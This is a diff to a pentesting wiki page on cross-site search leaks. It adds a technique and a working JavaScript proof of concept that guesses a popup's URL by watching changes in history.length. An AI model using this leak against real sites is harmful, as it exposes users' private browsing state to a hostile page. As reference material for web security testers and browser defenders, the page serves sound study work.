GitBook: [#3353] No subject

pentesting-web/xs-search.md

@@ -581,6 +581,33 @@ If the **max** number of **redirects** to follow of a browser is **20**, an atta
 The **History API** allows JavaScript code to manipulate the browser history, which **saves the pages visited by a user**. An attacker can use the length property as an inclusion method: to detect JavaScript and HTML navigation.\
 **Checking `history.length`**, making a user **navigate** to a page, **change** it **back** to the same-origin and **checking** the new value of **`history.length`**.
 
+### History Length with same URL
+
+* **Inclusion Methods**: Frames, Pop-ups
+* **Detectable Difference**: If URL is the same as the guessed one
+* **Summary:** It's possible to guess if the location of a frame/popup is in an specific URL abusing the history length.
+* **Code Example**: Below
+
+An attacker could use JavaScript code to **manipulate the frame/pop-up location to a guessed one** and **immediately** **change it to `about:blank`**. If the history length increased it means the URL was correct and it had time to **increase because the URL isn't reloaded if it's the same**. If it didn't increased it means it **tried to load the guessed URL** but because we **immediately after** loaded **`about:blank`**, the **history length did never increase** when loading the guessed url.
+
+```javascript
+async function debug(win, url) {
+    win.location = url + '#aaa';
+    win.location = 'about:blank';
+    await new Promise(r => setTimeout(r, 500));
+    return win.history.length;
+}
+
+win = window.open("https://example.com/?a=b");
+await new Promise(r => setTimeout(r, 2000));
+console.log(await debug(win, "https://example.com/?a=c"));
+
+win.close();
+win = window.open("https://example.com/?a=b");
+await new Promise(r => setTimeout(r, 2000));
+console.log(await debug(win, "https://example.com/?a=b"));
+```
+
 ### Frame Counting
 
 * **Inclusion Methods**: Frames, Pop-ups